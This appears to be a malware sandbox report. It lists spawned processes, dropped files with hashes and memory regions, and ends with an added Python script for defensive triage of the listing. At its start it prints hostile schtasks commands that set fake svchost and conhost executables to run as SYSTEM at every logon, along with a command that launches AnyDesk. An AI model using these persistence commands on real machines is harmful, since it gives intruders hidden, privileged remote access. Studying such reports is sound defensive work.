schtasks /Create /TN OneDriveTaskReport /TR "C:\ProgramData/svchost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN MicrosoftUpdateScheduler /TR "C:\ProgramData/conhost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\timeout.exe

timeout /T 2 /NOBREAK

C:\ProgramData\AnyDesk.exe

"C:\ProgramData/Anydesk.exe" --start

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --field-trial-handle=8576,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5188 /prefetch:8

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\E781.tmp\E782.tmp\E783.vbs

C:\Users\Admin\AppData\Roaming\doorbell-sys.exe

C:\Users\Admin\AppData\Local\Temp\EA41.tmp\EA42.tmp\EA43.bat

C:\Users\Admin\Downloads\AnyDesk.exe

C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

MD5 b06492be1b4392d0d2d2e1d34353756c
SHA1 43f488020dacf58aa90d5847d0660da2e31f382d
SHA256 e2fe485af23b5311cdf32417ca5b34b70a9e578fda060e8f3f7f9bbfae01a85a
SHA512 a60bc46a042eb1f2918ae60d9f2179d541a32d644fe0070ba9564493e254da543122c2f8593e8ca6d846138559189c79858ca3413aaba7fcf87c6a9f1512c8d9

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 e1cf0b1986c750165cb4c78386ef0648
SHA1 a4e8187cbdf2063ff154da0dd9c91116df44bb03
SHA256 eb68970fe0ae556917beb2db2f67e93a5378aea6382215b87a8511c40fa83468
SHA512 52ec0052e60ccd13c598d412d430e419dfa9d87cf98726bdc31285c12de6a4c2fa741c396cb4ffe4804d4a79a092114e29fa44f09fc1033e72a93b6e75317226

C:\Users\Admin\AppData\Roaming\AnyDesk\service.conf

MD5 de92c167e233d22b0d6dd303189266eb
SHA1 4659aa69736505312b22a48eff5b0f5d0c3d296b
SHA256 b065e0f5097158a55cd5ff02d3dfb48332b48dfb9ec7819315b33880d7e112a3
SHA512 ea6fefcef06d50af6aeacee9c1492b67bc36ec9a2fdaeeb0a9532da7794d7f31418a6f5789bd97e04139d0e413d60cb3812bd2035052c56945f849b662702150

C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

MD5 4082bd2835912384e76b58a119707f4a
SHA1 276289594b693479b6c4fe0df9c3adcf73d589d9
SHA256 6f9dc6059704ff2045bff8455c4c1ae1f0df3482310fa074fc26d209dc86dbf3
SHA512 7117830ce477b8570054b4342be631d24b9ee850319f98d307a545b7fb45fb7a1934c7630d3683be0ea3fe16d43a8b30007586feb2a6f9183377c229d74fb6cb

C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

MD5 e31aa53e5df82868677dc22fec582f4f
SHA1 4c36bdf36c88521ace6b68d5fc1d1b78ecb3432b
SHA256 fbadd1d9e5cddc476efb2935e0ed9542c5ef889bb2eb2c6119919afb98e03c36
SHA512 8544c22301f862391b7fd60f27dfc02379dfeffca3d9a2974d6ac03e78fd0b3f961ce4c99be8e27ce51ebbc9e55d8091358d620a070e06779c4e74c815efff18

memory/4700-141-0x00000000005E0000-0x0000000001D29000-memory.dmp

memory/1164-140-0x00000000005E0000-0x0000000001D29000-memory.dmp

C:\ProgramData\AnyDesk\system.conf

MD5 afdc4f69f4720b8c4153f6186f49a2b6
SHA1 329c27ea36d7913809b0c239bb58e91d2ee468ac
SHA256 9a218849d74b0ca75ef719b0cab59b40529b958097eb0b0b8527b09bc293a571
SHA512 3a8a6e1994a681a12875b820eb7ca78b6c035a1489c4d8648590424dbec3152e6831ac0c4a73560968231c9b45db869dad189109fb1ecb4a3159258e0099a7de

memory/5000-147-0x0000000000E70000-0x00000000025B9000-memory.dmp

C:\ProgramData\AnyDesk\system.conf

MD5 53104a709dd3d646ed949ab2ce114d8d
SHA1 51f72625311f8867f1da3cbd2f2a9e83bf1b32e9
SHA256 5ba770565afd71d7e197af6df64d525a62df167666f1cad9254473405318aaca
SHA512 25b84cc0408b5079c648d9fb2a1aba70cbf4f5f6112988b995cd00ffae2ab7d7613c2472a5682c2529b7bb6077ee0c16e6e62b86c1e3f1ab2f55db779bd8aad1

memory/4348-189-0x00000000005E0000-0x0000000001D29000-memory.dmp

C:\Users\Admin\AppData\Roaming\enc1.mp3

MD5 bbb44733d6b0bd75d6a26a9a4427705f
SHA1 c29d6ec521f30efb23331648a4a7a234b2db3894
SHA256 33b5c07a614eadb209b95b48454a10b1251809f8cc896577de5e117144b58507
SHA512 b846dce3ed1814e17b4f1a43910589e752e2ac911132d18275ff4d179796f1e7928a32636327a681d7c01edd704bec2efc8a12692597205bb334895c9063ceb3

C:\ProgramData\AnyDesk\system.conf

MD5 b4c040ee0975ae7e298efaecf36d760b
SHA1 a0a2a6e5421de66bb7b31391636aa122e8810712
SHA256 15a89b575da7b48af8ef157d9fe3c174cca484f30b74c4192162ec5c1c9b8d4f
SHA512 12e5209462ebb246ffb021b27256051c23e8c9d0abd2750caa170165ee68736b30a6f8b06c010fe7c7bbb0282ffac73cb0b1e4617b4c44c032dbad81dfefea19

C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

MD5 299a3d0add9586c846a4995db453c408
SHA1 74a2f40a7446be5b6cccc1a373ec6134bf14cadd
SHA256 b085c6c7919f00080efc268fafb0d1ee7f7555de061df6aa570b2ce5cb0f3010
SHA512 d2e72b3a62c93cb3340b2ee25b4dc0d67091222aa53d860d8e6948acd9640c1cae52b9faf556a86547e4e4f220b3f07eca019a53258290a669f59080df5f6dcc

memory/5524-234-0x0000000000E70000-0x00000000025B9000-memory.dmp

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 4ba0f615ae899d3af14458706041ebd4
SHA1 2dbc3fe4624a5a44f3bc3a98b67c240f0da0726d
SHA256 af1f86b5128814950c456b0b895d56269d818baa2a5de8e09dd0129056372750
SHA512 0bd7b1c95a8242ebaa47f51855310927aa59cb605f52f3a9fc8ae5d91062fb7cfc7bcaa277a09999cbeee8bd487d40a8ee8ab636a096a2f333169670ddec472a

C:\ProgramData\AnyDesk\system.conf

MD5 e64dad7b57d84ab8e5816602d53a44f4
SHA1 576222b4467aa25c4740b705e2061800e3503c83
SHA256 820816c2df12392f7ff15963ce6e6b1119d0a360ac740fb6ccd97c835aa1149a
SHA512 1390af4cc241d6c538860bc4d444aa5c6c22650b0e79d59064c56f7453846d6169c712a3b106a5e30c217cb493cbc16ea1861559265aa315d6998d19343e0c3b

C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

MD5 9fd56e6388a08018254058517774ba23
SHA1 d04203227eb0ae65dc0a1f3857d26f54e3051ba3
SHA256 26328e402eba779429f0752fcffdaaf3754faea2aea3df4d482778f580d63a16
SHA512 b3e6b7c3f1607ab5fcbe5bdcb47c133c1981e4fa4173b688f3cfa93694937b2d97b1f5a9d7807cbc455d8ee34757abb1afab9bb08603c9e375d0f61efaf521db

memory/5616-249-0x0000000000E70000-0x00000000025B9000-memory.dmp

C:\ProgramData\AnyDesk\service.conf

MD5 a1ac576efd51e7848e490c0659aaa764
SHA1 7d46a45e5fb31cfcd1da8299e21bdb1532e2dd24
SHA256 40ef916c45e8856486c6413bdae3c7b30b40c72e7fa8a0ee89477ac7009f1ec4
SHA512 114c67f536ed73cfc2cfd208211ba92a4fb271130e90279ae80623724fab259c9c91e2ee9c1e2f72002ed89a238af7240231f1cbde00e2443ebe37f3967193d7

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 ec932c86efcc80452ae4c5ca0db5c6a3
SHA1 207b03da5659fe6b57403b5cc7390b4caf34f8ce
SHA256 0d7c255061cd8f1996bef11e9c9b3086b04f2b231db6e1ae7bfb665a93af65b2
SHA512 98316e5362191699b202dd4c8226ca93a650c75c08e5f46a99248a985aaaecc2a6c3f1e74bd0db266d1e78bb25f5c708e397b23e0cc8a8584503c66cf02dc3c1

memory/5616-255-0x0000000000E70000-0x00000000025B9000-memory.dmp

C:\Users\Admin\AppData\Roaming\locked.exe

MD5 6d97d6c2be27f7633da8432a5f90ccd2
SHA1 5ffca0110e122848b772e563f74c057d7f782664
SHA256 47b78d957e366dbf484d44bca911f41a7a795309e0d3e4c9d08fdc135efbb77a
SHA512 518e5678a7631258f2373d7f76987f668531e972e04d5bdbdf8aacb2e2a568af618b1e4f338a289edf11e419cc6b4813e95c4433e0e849243d10e10a895cbfce

memory/776-266-0x0000000000E70000-0x00000000025B9000-memory.dmp

C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

MD5 5d22282e21e819c188c9a5153e785903
SHA1 61b90af93d494d264237bd14992d6fef0bd30a38
SHA256 d656c77dfb123675b5eba3768fc995df40648f9b401fcbe69e2c5f1a219994d5
SHA512 461faf743750848e824ef91b430697310279f8ef164465aa4f2793f044cda950896e733f83d97cd500956692e0b323f8f4d369fa77ae29e7f65b33bc6589bb4b

C:\ProgramData\AnyDesk\system.conf

MD5 a76627edf8de4838a8acd7a0fac60c37
SHA1 719ae0a6605b7df5dd2f64c868ab5b2cf6ad0b57
SHA256 01c5f9ba4628a54c5099dddedee57ca6bff5a77ccfc993bdccfd755d4af2f4ca
SHA512 5162218b7f15f3c47805bbf768ed85659659961045a783179d88cea07c84e4a7e037cdf8c5083a096141fc8cef70da36b63c107a6f7e02d72a512c188f7689eb

C:\ProgramData\AnyDesk\service.conf

MD5 a979dc84ede87fd1c06d6fd5a9555111
SHA1 8d25834eb4fac819561008aa8a945b99af960f45
SHA256 c4e764a4b98886aa2a0a5296b57eee9cb25237bd8e995c6487b1336151ea4931
SHA512 d7af4d901fbcf47c9236b948b8cf1703da77b39c260421c6696845ed9e27ad090fb1c7acebaacd0c574143a7b6db901f6411ef12996bb16f2924258fd06bac77

C:\Users\Admin\AppData\Local\Temp\2362.tmp\2363.tmp\2364.bat

MD5 4c8f4515dd2087309a35099fe2fffa35
SHA1 e75acce86a90f2996dc28a1de705cb708d753b37
SHA256 90a8a7ffa3265396f7d69509ef5652ef8bc69e241d4b63cdeca1baee1fa1fea6
SHA512 8699e45bf3ae83d60f913dcad302dfb8de3267cdb1fe6fa8813ea9c7c2c54d9b8bc9798dbcdcf9f1c4438f06226bf5e036a421d66892e9447722f434d08aa1d9

memory/776-274-0x0000000000E70000-0x00000000025B9000-memory.dmp

memory/5488-280-0x000001D41EBE0000-0x000001D41EC02000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nqupw5xj.y2a.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\users\Admin\downloads\stn.exe

MD5 5a1f7251dc370ebecd121ec50c3c7687
SHA1 63e672099264cdaecb7b23e9533da2e52e819de5
SHA256 ced26842f55378cc57ca36f3ae366b59e96eeb5a8a0abbc000eb72f16df01ee8
SHA512 afe17a4bf0e511c40072cb614ef619f10eaec878538299223946231658c4da1f7e652ca3b1dfe848da2ff8b17d8a47cfd9c76f6b35fee3a488b7407bb82be493

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 235a8eb126d835efb2e253459ab8b089
SHA1 293fbf68e6726a5a230c3a42624c01899e35a89f
SHA256 5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686
SHA512 a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

C:\Users\Admin\AppData\Roaming\doorbell2.ahk

MD5 d61c68849186eb9dbea169cceb79c2a6
SHA1 baca62e884a3d7dccae18ef64096db4d562def39
SHA256 6c4daf8ef0da2cf0ac079637a5c3062a610c4c710c7e4c55eedd1b010337bb1e
SHA512 deec0d4cb912d64db281459e8d01b21583fd7df3c46ea02cb66fffb5378ac6e1f375cb18f30ddccd908fc0c98d14094ea1620699f93498fc8c7be579a3a5d0b0

C:\ProgramData\svchost.exe

MD5 195594bf561f51edd8f766783b8c4791
SHA1 4be31254244e495bcb85b7dfcde98ca6be8789a0
SHA256 57a5abd41f0b9e52dc6390cecbe9caf1a6f2bbc73a9baba61a0fd57c7eb9e52a
SHA512 4a0df7637351a649458bae2b20a3317cb40b82ff03e4c53900b581a553626bf270f716d4deae19af86984012dfe22f5d92f5172ac1e6794c1956a792602123cc

C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe

MD5 2d0600fe2b1b3bdc45d833ca32a37fdb
SHA1 e9a7411bfef54050de3b485833556f84cabd6e41
SHA256 effdea83c6b7a1dc2ce9e9d40e91dfd59bed9fcbd580903423648b7ca97d9696
SHA512 9891cd6d2140c3a5c20d5c2d6600f3655df437b99b09ae0f9daf1983190dc73385cc87f02508997bb696ac921eee43fccdf1dc210cc602938807bdb062ce1703

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 446dd1cf97eaba21cf14d03aebc79f27
SHA1 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

C:\users\Admin\downloads\conhost.exe

MD5 3f609615628633f1ff84e6e73ed31ec0
SHA1 0015273fd5533b876b69dbbb1a0257b8f491c11f
SHA256 4fb9a00c6e3f24ac9cd7f171e1ffe1dcf3aecbe62defea080cd791c54767e2b4
SHA512 fc40a832de74166b21bc79f71947d053d3dfa5da87e5a0412349adf115955d09e078fa3849085d7afc1c3e537f6be83b88df235ba4cdf127e7d6e0406bf2d7a1

memory/5848-331-0x00007FF70C750000-0x00007FF70C848000-memory.dmp

memory/5848-340-0x00007FFCCBC90000-0x00007FFCCBCA1000-memory.dmp

memory/5848-348-0x00007FFCCB910000-0x00007FFCCB92B000-memory.dmp

memory/5524-330-0x0000000000E70000-0x00000000025B9000-memory.dmp

memory/5000-329-0x0000000000E70000-0x00000000025B9000-memory.dmp

memory/5848-352-0x000002D106CA0000-0x000002D106CB2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e5ea61f668ad9fe64ff27dec34fe6d2f
SHA1 5d42aa122b1fa920028b9e9514bd3aeac8f7ff4b
SHA256 8f161e4c74eb4ca15c0601ce7a291f3ee1dc0aa46b788181bfe1d33f2b099466
SHA512 cb308188323699eaa2903424527bcb40585792f5152aa7ab02e32f94a0fcfe73cfca2c7b3cae73a9df3e307812dbd18d2d50acbbfeb75d87edf1eb83dd109f34

memory/5848-349-0x000002D107BA0000-0x000002D10940F000-memory.dmp

memory/5848-351-0x000002D106C80000-0x000002D106C91000-memory.dmp

memory/5848-347-0x00007FFCCB930000-0x00007FFCCB941000-memory.dmp

memory/5848-346-0x00007FFCCB960000-0x00007FFCCB971000-memory.dmp

memory/5848-343-0x00007FFCCB9A0000-0x00007FFCCB9C1000-memory.dmp

memory/5848-345-0x00007FFCCB980000-0x00007FFCCB991000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d07f5f735cdea1655d0a91c8ee2e1f85
SHA1 466d2b3e488ccd0bc22d67728769ff7d911e972b
SHA256 eb067e633d59da091a04f4d5a0175f79c8cef4ee6c50a049ad229ed7528d9c81
SHA512 54d6737e448ae5b7b3b160a099be9a52d4db664553f9b44bfa5d2722325989360655b46423d80ec36120cbb65ec875debc5e91f8f2af04a36d33e6ae22d91f16

memory/5848-344-0x00007FFCCBC20000-0x00007FFCCBC38000-memory.dmp

memory/5848-342-0x00007FFCCBC40000-0x00007FFCCBC81000-memory.dmp

memory/5848-341-0x00007FFCBC570000-0x00007FFCBC77B000-memory.dmp

memory/5848-339-0x00007FFCCBCB0000-0x00007FFCCBCCD000-memory.dmp

memory/5848-338-0x00007FFCCBCD0000-0x00007FFCCBCE1000-memory.dmp

memory/5848-337-0x00007FFCCBF10000-0x00007FFCCBF27000-memory.dmp

memory/5848-336-0x00007FFCCBF30000-0x00007FFCCBF41000-memory.dmp

memory/5848-335-0x00007FFCCBF50000-0x00007FFCCBF67000-memory.dmp

memory/5848-334-0x00007FFCCC0D0000-0x00007FFCCC0E8000-memory.dmp

memory/5848-333-0x00007FFCBC780000-0x00007FFCBCA36000-memory.dmp

memory/5848-332-0x00007FFCCC490000-0x00007FFCCC4C4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 96ff1ee586a153b4e7ce8661cabc0442
SHA1 140d4ff1840cb40601489f3826954386af612136
SHA256 0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA512 3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

C:\Users\Admin\AppData\Roaming\doorbell.ahk

MD5 952ea1033b5f83c25ce5133944e4a65d
SHA1 9f50c5a2fb4aee93d154758c66d9ca81fd5fe3c5
SHA256 163b07a09d117ff1bdeb20ed83c1ebfb0917ce72ec63d32b4b6f8f87902f604a
SHA512 b500ceadee155d4f5e39348e205ce8339605732e82564545c04c9ac2a718ea7135fdc37ee8b3f60d035d26fae114022f04efd57e2cc9feb1231e18051c307785

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cae60f0ddddac635da71bba775a2c5b4
SHA1 386f1a036af61345a7d303d45f5230e2df817477
SHA256 b2dd636b7b0d3bfe44cef5e1175828b1fa7bd84d5563f54342944156ba996c16
SHA512 28ed8a8bc132ef56971cfd7b517b17cdb74a7f8c247ef6bff232996210075e06aa58a415825a1e038cfb547ad3dc6882bf1ca1b68c5b360ef0512a1440850253

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 09c40d1a114dc5a068e680ab67a5824c
SHA1 3c9d360d5c34638e4e3de3417c7f7f1b47e48eee
SHA256 b159c5c30b0f5143289d8c655f7fa9ecc04d102e5a5ce760772309c1892175a7
SHA512 795244bf21786e16a2f4843db7db27bc938d25fe50fa71665163fe55f65de6cfae5e7351dc3779291205541379a47726e13081ae7e1dbde89742f47e94eef602

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a9a9b8c327fc89d4b2e03cf7d8f0cca4
SHA1 b31953075db379e188400242985db5672df9e4ad
SHA256 8fdb37310ee7035cab6966aad39c8db7d0e5bc117e0b5f0fa97aff8cbcc4a1ce
SHA512 a6bd79b3fdaba75408091629d0b6bc306a01b4701bddb87101b5259f15b7805fd45248a7ca90172062cf8bf207e2117a25099ceeede7a15b0ad762c75f27a7c7

C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

MD5 99f781eb1d61bcb5fd6c77ced667fd47
SHA1 4ca95de59e3b952ea8b640cc5f9f5d26b2055af3
SHA256 5cebb7a97ca8255bc1e3667ab3ca2ec996b89a1f8d02c8a92dae3ca9cc6e47d0
SHA512 da43c3750f50ee3eec255af8f3146efa3bcacd1b6e8c7141bc517c48321869ec453b2d18d48ed19845d2758f8d0c2bc7eff07745ebff63f474199ef3070b9d88

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 accb531e589ed0273a14babbd5b3c80d
SHA1 67e28633d5e7d181fe9888e8f5849cef0b08cb83
SHA256 52af42098293b07d2bb7105b3af93fd131c319f803bf4d557984f34161522bd2
SHA512 82546db0a98edb6a5e8666459c9bfeeedb4153497fcb1681d14988c3161bd266d340b19efecc165eb69712e8345a4fc7cfb9105263cb46c1d94a4ccf27078c6b

C:\ProgramData\gcapi.dll

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
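Three things in the dropped-files list above deserve a closer look than a flat hash dump gives: the same path (for example C:\ProgramData\AnyDesk\system.conf) appears several times with different digests, meaning the file was rewritten during detonation; the four digests recorded for C:\ProgramData\gcapi.dll (MD5 d41d8cd9..., SHA1 da39a3ee..., SHA256 e3b0c442..., SHA512 cf83e135...) are the digests of zero-byte input, so that DLL was created but never written; and the memory dumps repeat one virtual range (0x5E0000-0x1D29000) across PIDs 4348, 4700 and 1164. The script below is an added triage example, not part of the sandbox report or of any tool it names. It assumes the listing format exactly as printed here (a path line, a blank line, then MD5/SHA1/SHA256/SHA512 lines, with memory entries named memory/PID-SEQ-0xSTART-0xEND-memory.dmp); the embedded sample is a constructed excerpt of entries copied from this section.

```python
import hashlib
import re
from collections import defaultdict

# Expected hex-digest lengths for the four algorithms the report lists.
HASH_LENGTHS = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
# Digests of zero-byte input, computed rather than hard-coded; an entry whose
# four digests all match these is an empty file on disk.
EMPTY_FILE_HASHES = {a: getattr(hashlib, a.lower())(b"").hexdigest() for a in HASH_LENGTHS}

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9A-Fa-f]+)$")
# memory/<pid>-<sequence>-0x<start>-0x<end>-memory.dmp (format assumed from the report)
MEMORY_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")

# Constructed excerpt: entries copied from the report's dropped-files list,
# trimmed to the cases the triage below is meant to surface.
SAMPLE_LISTING = r"""
memory/4348-30-0x00000000005E0000-0x0000000001D29000-memory.dmp

memory/4700-37-0x00000000005E0000-0x0000000001D29000-memory.dmp

C:\ProgramData\AnyDesk\system.conf

MD5 afdc4f69f4720b8c4153f6186f49a2b6
SHA1 329c27ea36d7913809b0c239bb58e91d2ee468ac
SHA256 9a218849d74b0ca75ef719b0cab59b40529b958097eb0b0b8527b09bc293a571
SHA512 3a8a6e1994a681a12875b820eb7ca78b6c035a1489c4d8648590424dbec3152e6831ac0c4a73560968231c9b45db869dad189109fb1ecb4a3159258e0099a7de

C:\ProgramData\AnyDesk\system.conf

MD5 53104a709dd3d646ed949ab2ce114d8d
SHA1 51f72625311f8867f1da3cbd2f2a9e83bf1b32e9
SHA256 5ba770565afd71d7e197af6df64d525a62df167666f1cad9254473405318aaca
SHA512 25b84cc0408b5079c648d9fb2a1aba70cbf4f5f6112988b995cd00ffae2ab7d7613c2472a5682c2529b7bb6077ee0c16e6e62b86c1e3f1ab2f55db779bd8aad1

C:\ProgramData\gcapi.dll

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
"""


def parse_listing(text):
    """Return (files, regions): file entries with their digests, and memory regions."""
    files, regions, current = [], [], None
    for line in (l.strip() for l in text.splitlines()):
        if not line:
            continue
        if m := MEMORY_RE.match(line):
            pid, seq, start, end = m.groups()
            regions.append({"pid": int(pid), "seq": int(seq),
                            "start": int(start, 16), "end": int(end, 16)})
        elif m := HASH_RE.match(line):
            algo, digest = m.group(1), m.group(2).lower()
            # Reject a digest of the wrong length or one with no path above it.
            if current is None or len(digest) != HASH_LENGTHS[algo]:
                raise ValueError(f"malformed or orphaned {algo} line: {line}")
            current["hashes"][algo] = digest
        else:
            # Any other non-blank line is a path that opens a new file entry.
            current = {"path": line, "hashes": {}}
            files.append(current)
    return files, regions


def triage(files, regions):
    """Surface empty files, rewritten paths and memory ranges shared across PIDs."""
    by_path = defaultdict(list)
    for f in files:
        by_path[f["path"]].append(f["hashes"].get("SHA256"))
    empty = [f["path"] for f in files
             if all(f["hashes"].get(a) == EMPTY_FILE_HASHES[a] for a in HASH_LENGTHS)]
    # A path listed more than once was written more than once; count distinct
    # contents so config churn (AnyDesk rewriting its .conf files) is visible.
    rewritten = {p: len(set(h)) for p, h in by_path.items() if len(h) > 1}
    # One virtual range dumped from several PIDs usually means the same
    # unpacked payload was started in each of those processes.
    shared = defaultdict(set)
    for r in regions:
        shared[(r["start"], r["end"])].add(r["pid"])
    return {
        "empty_files": empty,
        "rewritten_paths": rewritten,
        "shared_regions": {k: v for k, v in shared.items() if len(v) > 1},
    }


def region_size(region):
    return region["end"] - region["start"]


if __name__ == "__main__":
    files, regions = parse_listing(SAMPLE_LISTING)
    report = triage(files, regions)
    for path in report["empty_files"]:
        print(f"zero-byte file: {path}")
    for path, n in report["rewritten_paths"].items():
        print(f"written with {n} distinct contents: {path}")
    for (start, end), pids in report["shared_regions"].items():
        print(f"region 0x{start:X}-0x{end:X} dumped from PIDs {sorted(pids)}")
```

Run it against the full listing by reading the section into SAMPLE_LISTING's place; the empty-file check uses digests computed by hashlib at runtime, so it works unchanged for reports that list only a subset of the four algorithms as long as every algorithm present matches. An empty dropped DLL is worth noting in the timeline rather than hashing into a blocklist, since the empty-input digests will match every zero-byte file on every host.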